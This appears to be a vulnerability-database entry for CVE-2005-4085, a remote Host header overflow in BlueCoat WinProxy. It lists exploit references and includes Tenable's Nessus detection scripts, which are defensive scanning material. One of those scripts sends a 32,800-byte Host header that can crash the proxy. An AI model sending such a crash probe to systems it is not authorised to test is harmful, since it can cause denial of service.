Vulnerabilities > CVE-2005-4085 - Remote Host Header Buffer Overflow vulnerability in Bluecoat Proxyav and Webproxy
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
PARTIAL Availability impact
PARTIAL Summary
Buffer overflow in BlueCoat (a) WinProxy before 6.1a and (b) the web console access functionality in ProxyAV before 2.4.2.3 allows remote attackers to execute arbitrary code via a long Host: header.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| Application | 19 | |
| Hardware | 1 |
Exploit-Db
description BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit. CVE-2005-4085. Remote exploit for windows platform id EDB-ID:1408 last seen 2016-01-31 modified 2006-01-07 published 2006-01-07 reporter FistFuXXer source https://www.exploit-db.com/download/1408/ title BlueCoat WinProxy 6.0 R1c Host Remote Stack/SEH Overflow Exploit description Blue Coat WinProxy Host Header Overflow. CVE-2005-4085. Remote exploit for windows platform id EDB-ID:16691 last seen 2016-02-02 modified 2010-07-12 published 2010-07-12 reporter metasploit source https://www.exploit-db.com/download/16691/ title Blue Coat WinProxy Host Header Overflow
Metasploit
| description | This module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending a long port value for the Host header in a HTTP request. |
| id | MSF:EXPLOIT/WINDOWS/PROXY/BLUECOAT_WINPROXY_HOST |
| last seen | 2020-06-01 |
| modified | 2017-07-24 |
| published | 2006-01-08 |
| references | |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/proxy/bluecoat_winproxy_host.rb |
| title | Blue Coat WinProxy Host Header Overflow |
Nessus
NASL family Firewalls NASL id WINPROXY_61A.NASL description The remote host is running WinProxy, a proxy server for Windows. According to the Windows registry, the installed version of WinProxy suffers from denial of service and buffer overflow vulnerabilities in its telnet and web proxy servers. An attacker may be able to exploit these issues to crash the proxy or even execute arbitrary code on the affected host. last seen 2020-06-01 modified 2020-06-02 plugin id 20393 published 2006-01-10 reporter This script is Copyright (C) 2006-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/20393 title WinProxy < 6.1a Multiple Vulnerabilities (credentialed check) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(20393); script_version("1.14"); script_cve_id("CVE-2005-3187", "CVE-2005-3654", "CVE-2005-4085"); script_bugtraq_id(16147, 16148, 16149); script_name(english:"WinProxy < 6.1a Multiple Vulnerabilities (credentialed check)"); script_summary(english:"Checks for multiple vulnerabilities in WinProxy < 6.1a"); script_set_attribute(attribute:"synopsis", value: "The remote proxy is affected by multiple vulnerabilities." ); script_set_attribute(attribute:"description", value: "The remote host is running WinProxy, a proxy server for Windows. According to the Windows registry, the installed version of WinProxy suffers from denial of service and buffer overflow vulnerabilities in its telnet and web proxy servers. An attacker may be able to exploit these issues to crash the proxy or even execute arbitrary code on the affected host." ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?40f07cd6" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?3a6c81a5" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?79b3006b" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8c88612f" ); script_set_attribute(attribute:"solution", value: "Upgrade to WinProxy version 6.1a or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Blue Coat WinProxy Host Header Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/10"); script_set_attribute(attribute:"patch_publication_date", value: "2006/01/05"); script_set_attribute(attribute:"vuln_publication_date", value: "2006/01/05"); script_cvs_date("Date: 2018/08/06 14:03:14"); script_set_attribute(attribute:"plugin_type", value:"local"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Firewalls"); script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc."); script_dependencies("smb_hotfixes.nasl"); script_require_keys("SMB/Registry/Enumerated"); script_require_ports(139, 445); exit(0); } if (!get_kb_item("SMB/Registry/Enumerated")) exit(0); # Look in the registry for evidence of WinProxy. name = get_kb_item("SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/WinProxy 6/DisplayName"); if (name && name =~ "^WinProxy \(Version ([0-5]\.|6\.0)") { security_hole(0); exit(0); }NASL family Firewalls NASL id WINPROXY_HTTP_61A.NASL description The remote host is running WinProxy, a proxy server for Windows. The installed version of WinProxy last seen 2020-06-01 modified 2020-06-02 plugin id 20391 published 2006-01-10 reporter This script is Copyright (C) 2006-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/20391 title WinProxy < 6.1a HTTP Proxy Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(20391); script_version("1.19"); script_cve_id("CVE-2005-3187", "CVE-2005-4085"); script_bugtraq_id(16147, 16148); script_name(english:"WinProxy < 6.1a HTTP Proxy Multiple Vulnerabilities"); script_summary(english:"Checks for multiple vulnerabilities in WinProxy < 6.1a HTTP Proxy"); script_set_attribute(attribute:"synopsis", value: "The remote web proxy server is affected by denial of service and buffer overflow vulnerabilities." ); script_set_attribute(attribute:"description", value: "The remote host is running WinProxy, a proxy server for Windows. The installed version of WinProxy's HTTP proxy fails to handle long requests as well as requests with long Host headers. An attacker may be able to exploit these issues to crash the proxy or even execute arbitrary code on the affected host." ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?40f07cd6" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?3a6c81a5" ); script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8c88612f" ); script_set_attribute(attribute:"solution", value: "Upgrade to WinProxy version 6.1a or later." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Blue Coat WinProxy Host Header Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/10"); script_set_attribute(attribute:"patch_publication_date", value: "2006/01/05"); script_set_attribute(attribute:"vuln_publication_date", value: "2006/01/05"); script_cvs_date("Date: 2018/08/06 14:03:14"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_end_attributes(); script_category(ACT_DENIAL); script_family(english:"Firewalls"); script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc."); script_dependencies("find_service2.nasl", "httpver.nasl"); script_require_ports("Services/www", 80); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); port = get_http_port(default:80, dont_break: 1); # Make sure it looks like WinProxy. help = get_kb_banner(port: port, type: "help"); if (help && "Proxy-agent: BlueCoat-WinProxy" >< help) { # Flag it as a proxy. register_service(port:port, ipproto:"tcp", proto:"http_proxy"); # Try to exploit it. rq = http_mk_proxy_request(port: 80, item: "/", host: "127.0.0.1", method: "GET", scheme: "http", version: 10, add_headers: make_array("Host", crap(32800))); w = http_send_recv_req(port: port, req: rq); # If we didn't get anything, try resending the query. w = http_send_recv3(port: port, item:"/", method:"GET"); # There's a problem if we didn't get a response the second time. if (isnull(w)) security_hole(port); }
Packetstorm
| data source | https://packetstormsecurity.com/files/download/83192/bluecoat_winproxy_host.rb.txt |
| id | PACKETSTORM:83192 |
| last seen | 2016-12-05 |
| published | 2009-11-26 |
| reporter | MC |
| source | https://packetstormsecurity.com/files/83192/Blue-Coat-WinProxy-Host-Header-Overflow.html |
| title | Blue Coat WinProxy Host Header Overflow |
Seebug
| bulletinFamily | exploit |
| description | No description provided by source. |
| id | SSV:13614 |
| last seen | 2017-11-19 |
| modified | 2006-01-07 |
| published | 2006-01-07 |
| reporter | Root |
| source | https://www.seebug.org/vuldb/ssvid-13614 |
| title | BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit |
References
- http://secunia.com/advisories/18288
- http://secunia.com/advisories/18909
- http://securitytracker.com/id?1015441
- http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html
- http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
- http://www.securityfocus.com/bid/16147
- http://www.vupen.com/english/advisories/2006/0065
- http://www.vupen.com/english/advisories/2006/0622